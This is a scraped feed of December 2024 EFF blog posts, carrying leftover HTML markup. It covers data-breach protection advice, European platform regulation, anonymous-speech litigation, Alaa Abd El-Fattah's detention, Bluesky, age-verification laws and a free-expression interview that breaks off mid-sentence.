sort of identity theft that\u2019s made possible by some data breaches. Freezing your credit prevents someone from opening up a new line of credit in your name without additional information, like a PIN or password, to \u201cunfreeze\u201d the account. This might sound absurd considering they can\u2019t even open bank accounts, but if you have kids, you can freeze their credit too.\nKeep a close eye out for strange medical bills. With the number of health companies breached this year, it\u2019s also a good idea to watch for healthcare fraud. The Federal Trade Commission recommends watching for strange bills, letters from your health insurance company for services you didn\u2019t receive, and letters from debt collectors claiming you owe money.\u00a0\n\nHead back to the table of contents.\n(Dis)Honorable Mentions\nBy one report, 2023 saw over 3,000 data breaches. The figure so far this year is looking slightly smaller, with around 2,200 reported through the end of the third quarter. But 2,200 and counting is little comfort.\nWe did not investigate every one of these 2,000-plus data breaches, but we looked at a lot of them, including the news coverage and the data breach notification letters that many state Attorney General offices host on their websites. We can\u2019t award the coveted Breachie Award to every company that was breached this year. Still, here are some (dis)honorable mentions:\nADT, Advance Auto Parts, AT&T, AT&T (again), Avis, Casio, Cencora, Comcast, Dell, El Salvador, Fidelity, FilterBaby, Fortinet, Framework, Golden Corral, Greylock, Halliburton, HealthEquity, Heritage Foundation, HMG Healthcare, Internet Archive, LA County Department of Mental Health, MediSecure, Mobile Guardian, MoneyGram, muah.ai, Ohio Lottery, Omni Hotels, Oregon Zoo, Orrick, Herrington & Sutcliffe, Panda Restaurants, Panera, Patelco Credit Union, Patriot Mobile, pcTattletale, Perry Johnson & Associates, Roll20, Santander, Spytech, Synnovis, TEG, Ticketmaster, Twilio, USPS, Verizon, VF Corp, WebTPA.\nWhat now? Companies need to do a better job of only collecting the information they need to operate, and properly securing what they store. Also, the U.S. needs to pass comprehensive privacy protections. At the very least, we need to be able to sue companies when these sorts of breaches happen (and while we\u2019re at it, it\u2019d be nice if we got more than $5.21 checks in the mail). EFF has long advocated for a strong federal privacy law that includes a private right of action.<\/p><\/div><\/li>
<\/span><\/a><\/div>Saving the Internet in Europe: Defending Free Expression<\/a><\/span>
by Svea Windwehr<\/a> on December 19, 2024 at 6:26 pm <\/small>
This post is part two\u00a0in a series of posts about EFF\u2019s work in Europe. Read about how and why we work in Europe here.\u00a0\nEFF\u2019s mission is to ensure that technology supports freedom, justice, and innovation for all people of the world. While our work has taken us to far corners of the globe, in recent years we have worked to expand our efforts in Europe, building up a policy team with key expertise in the region, and bringing our experience in advocacy and technology to the European fight for digital rights. \nIn this blog post series, we will introduce you to the various players involved in that fight, share how we work in Europe, and how what happens in Europe can affect digital rights across the globe.\u00a0 \nEFF\u2019s approach to free speech \nThe global spread of Internet access and digital services promised a new era of freedom of expression, where everyone could share and access information, speak out and find an audience without relying on gatekeepers and make, tinker with and share creative works.\u00a0\u00a0\nEveryone should have the right to express themselves and share ideas freely. Various European countries have experienced totalitarian regimes and extensive censorship in the past century, and as a result, many Europeans still place special emphasis on privacy and freedom of expression. These values are enshrined in the European Convention of Human Rights and the Charter of Fundamental Rights of the European Union \u2013 essential legal frameworks for the protection of fundamental rights. \u00a0\nToday, as so much of our speech is facilitated by online platforms, there is an expectation, that they too respect fundamental rights. Through their terms of services, community guidelines or house rules, platforms get to unilaterally define what speech is permissible on their services. The enforcement of these rules can be arbitrary, untransparent and selective, resulting in the suppression of contentious ideas and minority voices. \u00a0\nThat\u2019s why EFF has been fighting against both government threats to free expression and to hold tech companies accountable for grounding their content moderation practices in robust human rights frameworks. That entails setting out clear rules and standards for internal processes such as notifications and explanations to users when terms of services are enforced or changed. In the European Union, we have worked for decades to ensure that laws governing online platforms respect fundamental rights, advocated against censorship and spoke up on behalf of human rights defenders.\u00a0\nWhat\u2019s the Digital Services Act and why do we keep talking about it?\u00a0\nFor the past years, we have been especially busy\u00a0addressing human rights concerns with the drafting and implementation of the DSA\u00a0the Digital Services Act (DSA), the new law setting out the rules for online services in the European Union. The DSA covers most online services, ranging from online marketplaces like Amazon, search engines like Google, social networks like Meta and app stores. However, not all of its rules apply to all services \u2013 instead, the DSA follows a risk-based approach that puts the most obligations on the largest services that have the highest impact on users. All service providers must ensure that their terms of services respect fundamental rights, that users can get in touch with them easily, and that they report on their content moderation activities. Additional rules apply to online platforms: they must give users detailed information about content moderation decisions and the right to appeal and additional transparency obligations. They also have to provide some basic transparency into the functioning of their recommender systems and are not allowed to target underage users with personalized ads. The most stringent obligations apply to the largest online platforms and search engines, which have more than 45 million users in the EU. These companies, which include X, TikTok, Amazon, Google Search and Play, YouTube, and several porn platforms, must proactively assess and mitigate systemic risks related to the design, functioning and use of their service their services. These include risks to the exercise of fundamental rights, elections, public safety, civic discourse, the protection of minors and public health. This novel approach might have merit but is also cause for concern: Systemic risks are barely defined and could lead to restrictions of lawful speech, and measures to address these risks, for example age verification, have negative consequences themselves, like undermining users\u2019 privacy and access to information. \u00a0\nThe DSA is an important piece of legislation to advance users\u2019 rights and hold companies accountable, but it also comes with significant risks. We are concerned about the DSA\u2019s requirement that service providers proactively share user data with law enforcement authorities and the powers it gives government agencies to request such data. We caution against the misuse of the DSA\u2019s emergency mechanism and the expansion of the DSA\u2019s systemic risks governance approach as a catch-all tool to crack down on undesired but lawful speech. Similarly, the appointment of trusted flaggers could lead to pressure on platforms to over remove content, especially as the DSA does not limit government authorities from becoming trusted flaggers. \u00a0\nEFF has been advocating for lawmakers to take a measured approach that doesn\u2019t undermine the freedom of expression. Even though we have been successful in avoiding some of the most harmful ideas, concerns remain, especially with regards to the politicization of the enforcement of the DSA and potential over-enforcement. That\u2019s why we will keep a close eye on the enforcement of the DSA, ready to use all means at our disposal to push back against over-enforcement and to defend user rights. \u00a0\nEuropean laws often implicate users globally. To give non-European users a voice in Brussels, we have been facilitating the DSA Human Rights Alliance. The DSA HR Alliance is formed around the conviction that the DSA must adopt a human rights-based approach to platform governance and consider its global impact. We will continue building on and expanding the Alliance to ensure that the enforcement of the DSA doesn\u2019t lead to unintended negative consequences and respects users\u2019 rights everywhere in the world. \nThe UK\u2019s Platform Regulation Legislation\u00a0\nIn parallel to the Digital Services Act, the UK has passed its own platform regulation, the Online Safety Act (OSA). Seeking to make the UK \u201cthe safest place in the world to be online,\u201d the OSA will lead to a more censored, locked-down internet for British users. The Act empowers the UK government to undermine not just the privacy and security of UK residents, but internet users worldwide.\u00a0\nOnline platforms will be expected to remove content that the UK government views as inappropriate for children. If they don\u2019t, they\u2019ll face heavy penalties. The problem is, in the UK as in the U.S. and elsewhere, people disagree sharply about what type of content is harmful for kids. Putting that decision in the hands of government regulators will lead to politicized censorship decisions. \u00a0\nThe OSA will also lead to harmful age-verification systems. You shouldn\u2019t have to show your ID to get online. Age-gating systems meant to keep out kids invariably lead to adults losing their rights to private speech, and anonymous speech, which is sometimes necessary. \u00a0\nAs Ofcom is starting to release their regulations and guidelines, we\u2019re watching how the regulator plans to avoid these human rights pitfalls, and will continue any fighting insufficient efforts to protect speech and privacy online.\u00a0\u00a0\nMedia freedom and plurality for everyone\u00a0\nAnother issue that we have been championing is media freedom. Similar to the DSA, the EU recently overhauled its rules for media services: the European Media Freedom Act (EMFA). In this context, we pushed back against rules that would have forced online platforms like YouTube, X, or Instagram to carry any content by media outlets. Intended to bolster media pluralism, making platforms host content by force has severe consequences: Millions of EU users can no longer trust that online platforms will address content violating community standards. Besides, there is no easy way to differentiate between legitimate media providers, and such that are known for spreading disinformation, such as government-affiliated Russia sites active in the EU. Taking away platforms' possibility to restrict or remove such content could undermine rather than foster public discourse. \u00a0\nThe final version of EMFA introduced a number of important safeguards but is still a bad deal for users: We will closely follow its implementation to ensure that the new rules actually foster media freedom and plurality, inspire trust in the media and limit the use of spyware against journalists. \u00a0\nExposing censorship and defending those who defend us\u00a0\nCovering regulation is just a small part of what we do. Over the past years, we have again and again revealed how companies\u2019 broad-stroked content moderation practices censor users in the name of fighting terrorism, and restrict the voices of LGBTQ folks, sex workers, and underrepresented groups. \u00a0\nGoing into 2025, we will continue to shed light on these restrictions of speech and will pay particular attention to the\u00a0censorship of Palestinian voices, which has been rampant. We will continue collaborating with our allies in the Digital Intimacy Coalition to share how restrictive speech policies often disproportionally affect sex workers. We will also continue to closely analyze the impact of the increasing and changing use of artificial intelligence in content moderation. \u00a0\nFinally, a crucial part of our work in Europe has been speaking out for those who cannot: human rights defenders facing imprisonment and censorship. \u00a0\nMuch work remains to be done. We have put forward comprehensive policy recommendations to European lawmakers\u00a0and we will continue fighting for an internet where everyone can make their voice heard. In the next posts in this series, you will learn more about how we work in Europe to ensure that digital markets are fair, offer users choice and respect fundamental rights.\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>We're Creating a Better Future for the Internet \ud83e\uddd1\u200d\ud83c\udfed<\/a><\/span>
by Aaron Jue<\/a> on December 19, 2024 at 5:20 pm <\/small>
In the early years of the internet, website administrators had to face off with a burdensome and expensive process to deploy SSL certificates. But today, hundreds of thousands of people have used EFF\u2019s free Certbot tool to spread\u00a0that sweet HTTPS across the web. Now almost all internet traffic is encrypted, and everyone gets a basic level of security. Small actions mean big change when we act together. Will you support important work like this and give EFF a Year-End Challenge boost?\nGive Today\nUnlock Bonus Grants Before 2025\nMake a donation of ANY SIZE by December 31 and you\u2019ll help us unlock bonus grants! Every supporter gets us closer to a series of seven Year-End Challenge milestones set by EFF\u2019s board of directors. These grants become larger as the number of online rights supporters grows. Everyone counts! See our progress.\n\ud83d\udea7 Digital Rights: Under Construction \ud83d\udea7\nSince 1990, EFF has defended your digital privacy and free speech rights in the courts, through activism, and by making open source privacy tools. This team is committed to watching out for the users no matter what directions technological innovation may take us. And that\u2019s funded entirely by donations.\n\n\n fix_copyright_and_stay_golden.png\n \n \n \n \n\n \n\nShow your support for digital rights with free EFF member gear.\nWith help from people like you, EFF has been able to help unravel legal and ethical questions surrounding the rise of AI; push the USPTO to withdraw harmful patent proposals; fight for the public's right to access police drone footage; and show why banning TikTok and passing laws like the Kids Online Safety Act (KOSA) will not achieve internet safety.\nAs technology\u2019s reach continues to expand, so do everyone\u2019s concerns about harmful side effects. That\u2019s where EFF\u2019s ample experience in tech policy, the law, and human rights shines. You can help us.\nDonate to defend digital rights today and you\u2019ll help us unlock bonus grants before the year ends.\nJoin EFF!\nProudly Member-Supported Since 1990\n\nEFF is a member-supported U.S. 501(c)(3) organization. We\u2019re celebrating ELEVEN YEARS of top ratings from the nonprofit watchdog Charity Navigator! Your donation is tax-deductible as allowed by law.<\/p><\/div><\/li>
<\/span><\/a><\/div>There\u2019s No Copyright Exception to First Amendment Protections for Anonymous Speech<\/a><\/span>
by Corynne McSherry<\/a> on December 19, 2024 at 4:22 pm <\/small>
Some people just can\u2019t take a hint. Today\u2019s perfect example is a group of independent movie distributors that have repeatedly tried, and failed, to force Reddit to give up the IP addresses of several users who posted about downloading movies.\u00a0 \nThe distributors claim they need this information to support their copyright claims against internet service provider Frontier Communications, because it might be evidence that Frontier wasn\u2019t enforcing its repeat infringer policy and therefore couldn\u2019t claim safe harbor protections under the Digital Millennium. Copyright Act. Courts have repeatedly refused to enforce these subpoenas, recognizing the distributors couldn\u2019t pass the test the First Amendment requires prior to unmasking anonymous speakers. \u00a0 \nHere's the twist: after the magistrate judge in this case applied this standard and quashed the subpoena, the movie distributors sought review from the district court judge assigned to the case. The second judge also denied discovery as unduly burdensome but, in a hearing on the matter, also said there was no First Amendment issue because the users were talking about copyright infringement. In their subsequent appeal to the Ninth Circuit, the distributors invite the appellate court to endorse the judge\u2019s statement.\u00a0 \nAs we explain in an amicus brief supporting Reddit, the court should refuse that invitation. Discussions about illegal activity clearly are protected speech. Indeed, the Supreme Court recently affirmed that even \u201cadvocacy of illegal acts\u201d is \u201cwithin the First Amendment\u2019s core.\u201d In fact, protecting such speech is a central purpose of the First Amendment because it ensures that people can robustly debate civil and criminal laws and advocate for change.\u00a0 \nThere is no reason to imagine that this bedrock principle doesn\u2019t apply just because the speech concerns copyright infringement \u2013 \u2014especially where the speakers aren\u2019t even defendants in the case, but independent third parties. And unmasking Does in copyright cases carries particular risks given the long history of copyright claims being used as an excuse to take down lawful as well as infringing content online.\u00a0 \nWe\u2019re glad to see Reddit fighting back against these improper subpoenas, and proud to stand with the company as it stands up for its users.\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>UK Politicians Join Organizations in Calling for Immediate Release of Alaa Abd El-Fattah<\/a><\/span>
by Paige Collings<\/a> on December 19, 2024 at 12:06 pm <\/small>
As the UK\u2019s Prime Minister Keir Starmer and Foreign Secretary David Lammy have failed to secure the release of British-Egyptian blogger, coder, and activist Alaa Abd El-Fattah, UK politicians call for tougher measures to secure Alaa\u2019s immediate return to the UK.\nDuring a debate on detained British nationals abroad in early December, chairwoman of the Commons Foreign Affairs Committee Emily Thornberry asked the House of Commons why the UK has continued to organize industry delegations to Cairo while \u201cthe Egyptian government have one of our citizens\u2014Alaa Abd El-Fattah\u2014wrongfully held in prison without consular access.\u201d\nIn the same debate, Labour MP John McDonnell urged the introduction of a \u201cmoratorium on any new trade agreements with Egypt until Alaa is free,\u201d which was supported by other politicians. Liberal Democrat MP Calum Miller also highlighted words from Alaa, who told his mother during a recent prison visit that he had \u201chope in David Lammy, but I just can\u2019t believe nothing is happening...Now I think either I will die in here, or if my mother dies I will hold him to account.\u201d\nAlaa\u2019s mother, mathematician Laila Soueif, has been on hunger strike for 79 days while she and the rest of his family have worked to engage the British government in securing Alaa\u2019s release. On December 12, she also started protesting daily outside the Foreign Office and has since been joined by numerous MPs.\nSupport for Alaa has come from many directions. On December 6, 12 Nobel laureates wrote to Keir Starmer urging him to secure Alaa\u2019s immediate release \u201cNot only because Alaa is a British citizen, but to reanimate the commitment to intellectual sanctuary that made Britain a home for bold thinkers and visionaries for centuries.\u201d The pressure on Labour\u2019s senior politicians has continued throughout the month, with more than 100 MPs and peers writing to David Lammy on December 15 demanding Alaa\u2019 be freed.\u00a0 \u00a0\nAlaa should have been released on September 29, after serving his five-year sentence for sharing a Facebook post about a death in police custody, but Egyptian authorities have continued his imprisonment in contravention of the country\u2019s own Criminal Procedure Code. British consular officials are prevented from visiting him in prison because the Egyptian government refuses to recognise Alaa\u2019s British citizenship.\nDavid Lammy met with Alaa\u2019s family in November and promised to take action. But the UK\u2019s Prime Minister failed to raise the case at the G20 Summit in Brazil when he met with Egypt\u2019s President El-Sisi.\u00a0\nIf you\u2019re based in the UK, here are some actions you can take to support the calls for Alaa\u2019s release:\n\nWrite to your MP (external link): https:\/\/freealaa.net\/message-mp\u00a0\nJoin Laila Soueif outside the Foreign Office daily between 10-11am\nShare Alaa\u2019s plight on social media using the hashtag #freealaa\n\nThe UK Prime Minister and Foreign Secretary\u2019s inaction is unacceptable. Every second counts, and time is running out. The government must do everything it can to ensure Alaa\u2019s immediate and unconditional release.<\/p><\/div><\/li>
<\/span><\/a><\/div>What You Should Know When Joining Bluesky<\/a><\/span>
by Rory Mir<\/a> on December 18, 2024 at 5:51 pm <\/small>
Bluesky promises to rethink social media by focusing on openness and user control. But what does this actually mean for the millions of people joining the site?\nNovember was a good month for alternatives to X. Many users hit their balking point after two years of controversial changes turned Twitter into X, a restrictive hub filled with misinformation and hate speech. Musk\u2019s involvement in the U.S. presidential election was the last straw for many who are now looking for greener pastures.\nThreads, the largest alternative, grew about 15% with 35 million new users. However, the most explosive growth came from Bluesky, seeing over 500% growth and a total user base of over 25 million users at the time of writing.\nWe\u2019ve dug into the nerdy details of how Mastodon, Threads, and Bluesky compare, but given this recent momentum it\u2019s important to clear up some questions for new Bluesky users, and what this new approach to the social web really means for how you connect with people online.\nNote that Bluesky is still in an early stage, and many big changes are anticipated from the project. Answers here are accurate as of the time of writing, and will indicate the company\u2019s future plans where possible.\nIs Bluesky Just Another Twitter?\nAt face value the Bluesky app has a lot of similarities to Twitter prior to becoming X. That\u2019s by design: the Bluesky team has prioritized making a drop-in replacement for 2022 Twitter, so everything from the layout, posting options, and even color scheme will feel familiar to users familiar with that site.\u00a0\nWhile discussed in the context of decentralization, this experience is still very centralized like traditional social media, with a single platform controlled by one company, Bluesky PBLLC. However, a few aspirations from this company make it stand out:\u00a0\n\nPrioritizing interoperability and community development: Other platforms frequently get this wrong, so this dedication to user empowerment and open source tooling is commendable.\u00a0\n\u201cCredible Exit\u201d Decentralization: Bluesky the company wants Bluesky, the network, to be able to function even if the company is eliminated or \u2018enshittified.\u2019\n\nThe first difference is evident already from the wide variety of tools and apps on the network. From blocking certain content to highlighting communities you\u2019re a part of, there are a lot of settings to make your feed yours\u2014 some of which we walked through here. You can also abandon Bluesky\u2019s Twitter-style interface for an app like Firesky, which presents a stream of all Bluesky content. Other apps on the network can even be geared towards sharing audio, events, or work as a web forum, all using the same underlying AT protocol. This interoperable and experimental ecosystem parallels another based on the ActivityPub protocol, called \u201cThe Fediverse\u201d, which connects Threads to Mastodon as well as many other decentralized apps which experiment with the functions of traditional social media sites.\nThat \u201ccredible exit\u201d priority is less immediately visible, but explains some of the ways Bluesky looks different. The most visible difference is that usernames are domain names, with the default for new users being a subdomain of bsky.social. EFF set it up so that our account name is our website, @eff.org, which will be the case across the Bluesky network, even if viewed with different apps. Comparable to how Mastodon handles verification, no central authority or government documents are needed for verification, just proof of control over a site or record.\nAs Bluesky decentralizes, it is likely to diverge more from the Twitter experience as the tricky problems of decentralization creep in.\u00a0\nHow Is Bluesky for Privacy?\nWhile Bluesky is not engaged in surveillance-based advertising like many incumbent social media platforms, users should be aware that shared information is more public and accessible than they might expect.\nBluesky, the app, offers some sensible data-minimizing defaults like requiring user consent for third-party embedded media, which can include tracking. The real assurance to users, however, is that even if the flagship apps were to become less privacy protective, the open tools let others make full-featured alternative apps on the same network.\nHowever, by design, Bluesky content is fully public on the network. Users can change privacy settings to encourage apps on the network to require login to view your account, but it is optional to honor. Every post, every like, and every share is visible to the world. Even blocking data is plainly visible. By design all of this information is also accessible in one place, as Bluesky aims to be the megaphone for a global audience Twitter once was.\nThis transparency extends to how Bluesky handles moderation, where users and content are labeled by a combination of Bluesky moderators, community moderators, and automated labeling. The result is information about you will, over time, be held by these moderators to either promote or hide your content.\nUsers leaving X out of frustration for the platform using public content to feed AI training may also find that this approach of funneling all content into one stream is very friendly to scraping for AI training by third parties.\u00a0 Bluesky\u2019s CEO has been clear the company will not engage in AI licensing deals, but it\u2019s important to be clear this is inherent to any network prioritizing openness. The freedom to use public data for creative expression, innovation, and research extends to those who use it to train AI.\nUsers you have blocked may also be able to use this public stream to view your posts without interacting with you. If your threat model includes trolls and other bad actors who might reshare your posts in other contexts, this is important to consider.\nDirect messages are not included in this heap of public information. However they are not end-to-end encrypted, and only hosted by Bluesky servers. As was the case for X, that means any DM is visible to Bluesky PBLLC. DMs may be accessed for moderation, for valid police warrants, and may even one day be public through a data breach. Encrypted DMs are planned, but we advise sensitive conversations be moved to dedicated fully encrypted conversations.\nHow Do I Find People to Follow?\nTools like Skybridge are being built to make it easier for people to import their Twitter contacts into Bluesky. Similar to advice we gave for joining Mastodon, keep in mind these tools may need extensive account access, and may need to be re-run as more people switch networks.\nBluesky has also implemented \u201cstarter packs,\u201d which are curated lists of users anyone can create and share to new users. EFF recently put together a few for you to check out:\n\nElectronic Frontier Foundation Staff\nElectronic Frontier Alliance members\nDigital Rights, News & Advocacy\n\nIs Bluesky In the Fediverse?\n\u201cFediverse\u201d refers to a wide variety of sites and services generally communicating with each other over the ActivityPub protocol, including Threads, Mastodon, and a number of other projects. Bluesky uses the AT Protocol, which is not currently compatible with ActivityPub, thus it is not part of \u201cthe fediverse.\u201d\nHowever, Bluesky is already being integrated into the vision of an interoperable and decentralized social web. You can follow Bluesky accounts from the fediverse over RSS. A number of mobile apps will also seamlessly merge Bluesky and fediverse feeds and let you post to both accounts. Even with just one Bluesky or fediverse account, users can also share posts and DMs to both networks using a project called Bridgy Fed.\nIn recent weeks this bridging also opened up to the hundreds of millions of Threads users. It just requires an additional step of enabling fediverse sharing, before connecting to the fediverse Bridgy Fed account.\u00a0 We\u2019re optimistic that all of these projects will continue to improve integrations even more in the future.\nIs the Bluesky Network Decentralized?\nThe current Bluesky network is not decentralized.\u00a0\nIt is nearly all made and hosted by one company, Bluesky PBLLC, which is working on creating the \u201ccredible exit\u201d from their control as a platform host. If Bluesky the company and the infrastructure it operates disappeared tonight, however, the entire Bluesky network would effectively vanish along with it.\nOf the 25 million users, only 10,000 are hosted by a non-Bluesky services \u2014 most of which through fediverse connections. Changing to another host is also currently a one-way exit.\u00a0 All DMs rely on Bluesky owned servers, as does the current system for managing user identities, as well as the resource-intensive \u201cRelay\u201d server aggregating content from across the network. The same company also handles the bulk of moderation and develops the main apps used by most users. Compared to networks like the fediverse or even email, hosting your own Bluesky node currently requires a considerable investment.\nOnce this is no longer the case, a \u201ccredible exit\u201d is also not quite the same as \u201cdecentralized.\u201d An escape hatch for particularly dire circumstances is good, but it falls short of the distributed power and decision making of decentralized networks. This distinction will become more pressing as the reliance on Bluesky PBLLC is tested, and the company opens up to more third parties for each component of the network.\u00a0\nHow Does Bluesky Make Money?\nThe past few decades have shown the same \u2018enshittification\u2019 cycle too many times. A new startup promises something exciting, users join, and then the platform turns on users to maximize profits\u2014often through surveillance and restricting user autonomy.\u00a0\nWill Bluesky be any different? From the team\u2019s outlined plan we can glean that Bluesky promises not to use surveillance-based advertising, nor lock-in users. Bluesky CEO Jay Graber also promised to not sell user content to AI training licenses and intends to always keep the service free to join. Paid services like custom domain hosting or paid subscriptions seem likely.\u00a0\nSo far, though, the company relies on investment funding. It was initially incubated by Twitter co-founder Jack Dorsey\u2014 who has since distanced himself from the project\u2014and more recently received 8 million and 15 million dollar rounds of funding.\u00a0\nThat later investment round has raised concerns among the existing userbase that Bluesky would pivot to some form of cryptocurrency service, as it was led by Blockchain Capital, a cryptocurrency focused venture capital company which also had a partner join the Bluesky board. Jay Graber committed to \u201cnot hyperfinancialize the social experience\u201d with blockchain projects, and emphasized that Bluesky does not use blockchain.\nAs noted above, Bluesky has prioritized maintaining a \u201ccredible exit\u201d for users, a commitment to interoperability that should keep the company accountable to the community and hopefully prevent the kind of \u201censhittification\u201d that drove people away from X. Holding the company to all of these promises will be key to seeing the Bluesky network and the AT protocol reach that point of maturity.\nHow Does Moderation Work?\nOur comparison of Mastodon, Threads, and Bluesky gets into more detail, but as it stands Bluesky\u2019s moderation is similar to Twitter\u2019s before Musk. The Bluesky corporation uses the open moderation tools to label posts and users, and will remove users from their hosted services for breaking their terms of service. This tooling keeps the Bluesky company\u2019s moderation tied to its \u201ccredible exit\u201d goals, giving it the same leverage any other future operator might have. It also means\u00a0 Bluesky\u2019s centralized moderation of today can\u2019t scale, and even with a good faith effort it will run into issues.\nBluesky accounts for this by opening its moderation tools to the community. Advanced options are available under settings in the web app, and anyone can label content and users on the site. These labels let users filter, prioritize, or block content. However, only Bluesky has the power to \u201cdeplatform\u201d poorly behaved users by removing them, either by no longer hosting their account, no longer relaying their content to other users, or both.\nBluesky aspires to censorship resistance, and part of creating a \u201ccredible exit\u201d means reducing the company\u2019s ability to remove users entirely. In a future with a variety of hosts and relays on the Bluesky network, removing a user looks more like removing a website from the internet\u2014not impossible, but very difficult. Instead users will need to settle with filtering out or blocking speech they object to, and take some comfort that voices they align with will not be removed from the network.\u00a0\nThe permeability of Bluesky also means community tooling will need to address network abuses, like last May when a pro-Trump botnet on Nostr bridged to Bluesky via Mastodon to flood timelines. It\u2019s possible that like in the Fediverse, Bluesky may eventually form a network of trusted account hosts and relays to mitigate these concerns. \nBluesky is still a work in progress, but its focus on decentralization, user control, and interoperability makes it an exciting space to watch. Whether you\u2019re testing the waters or planning a full migration, these insights should help you navigate the platform.<\/p><\/div><\/li>
<\/span><\/a><\/div>Australia Banning Kids from Social Media Does More Harm Than Good<\/a><\/span>
by Paige Collings<\/a> on December 18, 2024 at 5:42 pm <\/small>
Age verification systems are surveillance systems that threaten everyone\u2019s privacy and anonymity. But Australia\u2019s government recently decided to ignore these dangers, passing a vague, sweeping piece of age verification legislation after giving only a day for comments. The Online Safety Amendment (Social Media Minimum Age) Act 2024, which bans children under the age of 16 from using social media, will force platforms to take undefined \u201creasonable steps\u201d to verify users\u2019 ages and prevent young people from using them, or face over $30 million in fines.\u00a0\nThe country\u2019s Prime Minister, Anthony Albanese, claims that the legislation is needed to protect young people in the country from the supposed harmful effects of social media, despite no study showing such an impact. This legislation will be a net loss for both young people and adults who rely on the internet to find community and themselves.\nThe law does not specify which social media platforms will be banned. Instead, this decision is left to Australia\u2019s communications minister who will work alongside the country\u2019s internet regulator, the eSafety Commissioner, to enforce the rules. This gives government officials dangerous power to target services they do not like, all at a cost to both minor and adult internet users.\nThe legislation also does not specify what type of age verification technology will be necessary to implement the restrictions but prohibits using only government IDs for this purpose. This is a flawed attempt to protect privacy. \nSince platforms will have to provide other means to verify their users' ages other than by government ID, they will likely rely on unreliable tools like biometric scanners. The Australian government awarded the contract for testing age verification technology to a UK-based company, Age Check Certification Scheme (ACCS) who, according to the company website, \u201ccan test all kinds of age verification systems,\u201d including \u201cbiometrics, database lookups, and artificial intelligence-based solutions.\u201d\u00a0\nThe ban will not take effect for at least another 12 months while these points are decided upon, but we are already concerned that the systems required to comply with this law will burden all Australians\u2019 privacy, anonymity, and data security.\nBanning social media and introducing mandatory age verification checks is the wrong approach to protecting young people online, and this bill was hastily pushed through the Parliament of Australia with little oversight or scrutiny. We urge politicians in other countries\u2014like the U.S. and France\u2014to explore less invasive approaches to protecting all people from online harms\u00a0and focus on comprehensive privacy protections, rather than mandatory age verification.<\/p><\/div><\/li>
<\/span><\/a><\/div>EFF Statement on U.S. Supreme Court's Decision to Consider TikTok Ban<\/a><\/span>
by David Greene<\/a> on December 18, 2024 at 5:36 pm <\/small>
The TikTok ban itself and the DC Circuit's approval of it should be of great concern even to those who find TikTok undesirable or scary. Shutting down communications platforms or forcing their reorganization based on concerns of foreign propaganda and anti-national manipulation is an eminently anti-democratic tactic, one that the U.S. has previously condemned globally.\nThe U.S. government should not be able to restrict speech\u2014in this case by cutting off a tool used by 170 million Americans to receive information and communicate with the world\u2014without proving with evidence that the tools are presently seriously harmful. But in this case, Congress has required and the DC Circuit approved TikTok\u2019s forced divestiture based only upon fears of future potential harm. This greatly lowers well-established standards for restricting freedom of speech in the U.S.\u00a0\nSo we are pleased that the Supreme Court will take the case and will urge the justices to apply the appropriately demanding First Amendment scrutiny.<\/p><\/div><\/li>
<\/span><\/a><\/div>Speaking Freely: Winnie Kabintie<\/a><\/span>
by David Greene<\/a> on December 18, 2024 at 5:27 pm <\/small>
Winnie Kabintie is a journalist and Communications Specialist based in Nairobi, Kenya. As an award-winning youth media advocate, she is passionate about empowering young people with Media and Information Literacy skills, enabling them to critically engage with and shape the evolving digital\u00a0 media landscape in meaningful ways.\nGreene: To get us started, can you tell us what the term free expression means to you?\u00a0\nI think it's the opportunity to speak in a language that you understand and speak about subjects of concern to you and to anybody who is affected or influenced by the subject of conversation. To me, it is the ability to communicate openly and share ideas or information without interference, control, or restrictions.\u00a0\nAs a journalist, it means having the freedom to report on matters affecting society and my work without censorship or limitations on where that information can be shared. Beyond individual expression, it is also about empowering communities to voice their concerns and highlight issues that impact their lives. Additionally, access to information is a vital component of freedom of expression, as it ensures people can make informed decisions and engage meaningfully in societal discourse because knowledge is power.\nGreene: You mention the freedom to speak and to receive information in your language. How do you see that currently? Are language differences a big obstacle that you see currently?\u00a0\nIf I just look at my society\u2014I like to contextualize things\u2014we have Swahili, which is a national language, and we have English as the secondary official language. But when it comes to policies, when it comes to public engagement, we only see this happening in documents that are only written in English. This means when it comes to the public barazas (community gatherings) interpretation is led by a few individuals, which creates room for disinformation and misinformation. I believe the language barrier is an obstacle to freedom of speech. We've also seen it from the civil society dynamics, where you're going to engage the community but you don't speak the same language as them, then it becomes very difficult for you to engage them on the subject at hand. And if you have to use a translator, sometimes what happens is you're probably using a translator for whom their only advantage, or rather the only advantage they bring to the table, is the fact that they understand different languages. But they're not experts in the topic that you're discussing.\nGreene: Why do you think the government only produces materials in English? Do you think part of that is because they want to limit who is able to understand them? Or is it just, are they lazy or they just disregard the other languages?\u00a0\nIn all fairness, I think it comes from the systematic approach on how things run. This has been the way of doing things, and it's easier to do it because translating some words from, for example, English to Swahili is very hard. And you see, as much as we speak Swahili in Kenya\u2014and it's our national language\u2014the kind of Swahili we speak is also very diluted or corrupted with English and Sheng\u2014I like to call \u201cki-shenglish\u201d. I know there were attempts to translate the new Kenyan Constitution, and they did translate some bits of the summarized copy, but even then it wasn\u2019t the full Constitution. We don't even know how to say certain words in Swahili from English which makes it difficult to translate many things. So I think it's just an innocent omission.\u00a0\nGreene: What makes you passionate about freedom of expression?\n\u00a0As a journalist and youth media advocate, my passion for freedom of expression stems from its fundamental role in empowering individuals and communities to share their stories, voice their concerns, and drive meaningful change. Freedom of expression is not just about the right to speak\u2014it\u2019s about the ability to question, to challenge injustices, and to contribute to shaping a better society.\nFor me, freedom of expression is deeply personal as I like to question, interrogate and I am not just content with the status quo. As a journalist, I rely on this freedom to shed light on critical issues affecting society, to amplify marginalized voices, and to hold power to account. As a youth advocate, I\u2019ve witnessed how freedom of expression enables young people to challenge stereotypes, demand accountability, and actively participate in shaping their future. We saw this during the recent Gen Z revolution in Kenya when youth took to the streets to reject the proposed Finance Bill.\nFreedom of speech is also about access. It matters to me that people not only have the ability to speak freely, but also have the platforms to articulate their issues. You can have all the voice you need, but if you do not have the platforms, then it becomes nothing. So it's also recognizing that we need to create the right platforms to advance freedom of speech. These, in our case, include platforms like radio and social media platforms.\u00a0\nSo we need to ensure that we have connectivity to these platforms. For example, in the rural areas of our countries, there are some areas that are not even connected to the internet. They don't have the infrastructure including electricity. It then becomes difficult for those people to engage in digital media platforms where everybody is now engaging. I remember recently during the Reject Finance Bill process in Kenya, the political elite realized that they could leverage social media and meet with and engage the youth. I remember the President was summoned to an X-space and he showed up and there was dialogue with hundreds of young 